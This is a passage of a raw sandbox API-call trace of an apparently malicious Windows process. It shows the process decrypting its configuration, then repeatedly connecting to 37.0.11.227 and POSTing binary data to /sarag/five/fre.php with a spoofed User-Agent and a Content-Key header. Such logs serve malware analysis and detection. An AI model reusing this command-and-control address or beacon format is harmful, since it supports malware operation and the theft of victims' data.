*/*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0302.745] GetProcessHeap () returned 0x690000 [0302.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0302.745] GetProcessHeap () returned 0x690000 [0302.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0302.745] send (s=0x9ec, buf=0x6ad508*, len=242, flags=0) returned 242 [0302.746] send (s=0x9ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0302.746] GetProcessHeap () returned 0x690000 [0302.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0302.746] recv (in: s=0x9ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0302.820] GetProcessHeap () returned 0x690000 [0302.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0302.821] GetProcessHeap () returned 0x690000 [0302.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0302.821] GetProcessHeap () returned 0x690000 [0302.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0302.821] GetProcessHeap () returned 0x690000 [0302.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0302.822] closesocket (s=0x9ec) returned 0 [0302.822] GetProcessHeap () returned 0x690000 [0302.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0302.822] GetProcessHeap () returned 0x690000 [0302.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0302.823] GetProcessHeap () returned 0x690000 [0302.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0302.823] GetProcessHeap () returned 0x690000 [0302.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0302.824] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x144c) returned 0x9ec [0302.826] Sleep (dwMilliseconds=0xea60) [0302.828] GetProcessHeap () returned 0x690000 [0302.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0302.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.830] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.839] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0302.849] GetProcessHeap () returned 0x690000 [0302.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0302.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.851] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0302.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.852] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.853] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.853] GetProcessHeap () returned 0x690000 [0302.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0302.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.855] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0302.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.856] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0302.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.857] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0302.857] GetProcessHeap () returned 0x690000 [0302.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0302.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.864] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.865] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.866] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.867] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.867] GetProcessHeap () returned 0x690000 [0302.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0302.868] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0302.868] GetProcessHeap () returned 0x690000 [0302.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0302.868] GetProcessHeap () returned 0x690000 [0302.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0302.869] GetProcessHeap () returned 0x690000 [0302.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0302.869] GetProcessHeap () returned 0x690000 [0302.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0302.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.873] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0302.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.878] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0302.888] GetProcessHeap () returned 0x690000 [0302.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0302.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.890] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0302.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.893] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0302.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.894] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.894] GetProcessHeap () returned 0x690000 [0302.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0302.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.897] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0302.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.898] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0302.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0302.899] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0302.899] GetProcessHeap () returned 0x690000 [0302.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0302.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.901] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0302.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.902] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0302.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.904] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0302.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0302.905] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0302.905] GetProcessHeap () returned 0x690000 [0302.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0302.905] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0302.905] GetProcessHeap () returned 0x690000 [0302.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0302.905] socket (af=2, type=1, protocol=6) returned 0x9f0 [0302.906] connect (s=0x9f0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0302.932] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0302.932] GetProcessHeap () returned 0x690000 [0302.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0302.932] GetProcessHeap () returned 0x690000 [0302.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0302.933] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0302.934] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0302.934] GetProcessHeap () returned 0x690000 [0302.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0302.934] GetProcessHeap () returned 0x690000 [0302.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0302.934] GetProcessHeap () returned 0x690000 [0302.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0302.934] GetProcessHeap () returned 0x690000 [0302.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0302.937] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0302.938] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0302.938] GetProcessHeap () returned 0x690000 [0302.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0302.938] GetProcessHeap () returned 0x690000 [0302.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0302.939] send (s=0x9f0, buf=0x6ad508*, len=242, flags=0) returned 242 [0302.947] send (s=0x9f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0302.947] GetProcessHeap () returned 0x690000 [0302.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0302.947] recv (in: s=0x9f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0303.016] GetProcessHeap () returned 0x690000 [0303.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0303.016] GetProcessHeap () returned 0x690000 [0303.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0303.017] GetProcessHeap () returned 0x690000 [0303.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0303.017] GetProcessHeap () returned 0x690000 [0303.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0303.018] closesocket (s=0x9f0) returned 0 [0303.018] GetProcessHeap () returned 0x690000 [0303.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0303.018] GetProcessHeap () returned 0x690000 [0303.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.019] GetProcessHeap () returned 0x690000 [0303.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.019] GetProcessHeap () returned 0x690000 [0303.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0303.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14b0) returned 0x9f0 [0303.022] Sleep (dwMilliseconds=0xea60) [0303.023] GetProcessHeap () returned 0x690000 [0303.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0303.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.024] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0303.041] GetProcessHeap () returned 0x690000 [0303.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0303.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.042] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0303.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.043] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.050] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.050] GetProcessHeap () returned 0x690000 [0303.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0303.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.052] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0303.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.053] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0303.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.054] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0303.054] GetProcessHeap () returned 0x690000 [0303.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.056] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.057] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.060] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.062] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.062] GetProcessHeap () returned 0x690000 [0303.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0303.062] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.062] GetProcessHeap () returned 0x690000 [0303.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0303.062] GetProcessHeap () returned 0x690000 [0303.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.063] GetProcessHeap () returned 0x690000 [0303.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.063] GetProcessHeap () returned 0x690000 [0303.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0303.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0303.081] GetProcessHeap () returned 0x690000 [0303.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0303.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.082] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0303.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.083] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.084] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.084] GetProcessHeap () returned 0x690000 [0303.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0303.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.086] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0303.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.088] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0303.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.089] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0303.089] GetProcessHeap () returned 0x690000 [0303.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.092] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0303.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.094] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0303.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.095] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0303.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.096] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0303.096] GetProcessHeap () returned 0x690000 [0303.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0303.096] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0303.096] GetProcessHeap () returned 0x690000 [0303.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0303.096] socket (af=2, type=1, protocol=6) returned 0x9f4 [0303.097] connect (s=0x9f4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0303.126] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0303.126] GetProcessHeap () returned 0x690000 [0303.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0303.126] GetProcessHeap () returned 0x690000 [0303.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0303.127] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.128] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0303.128] GetProcessHeap () returned 0x690000 [0303.128] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0303.128] GetProcessHeap () returned 0x690000 [0303.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.129] GetProcessHeap () returned 0x690000 [0303.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0303.129] GetProcessHeap () returned 0x690000 [0303.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0303.130] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.131] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0303.131] GetProcessHeap () returned 0x690000 [0303.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0303.131] GetProcessHeap () returned 0x690000 [0303.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.132] send (s=0x9f4, buf=0x6ad508*, len=242, flags=0) returned 242 [0303.133] send (s=0x9f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0303.133] GetProcessHeap () returned 0x690000 [0303.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0303.133] recv (in: s=0x9f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0303.227] GetProcessHeap () returned 0x690000 [0303.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0303.227] GetProcessHeap () returned 0x690000 [0303.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.228] GetProcessHeap () returned 0x690000 [0303.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: 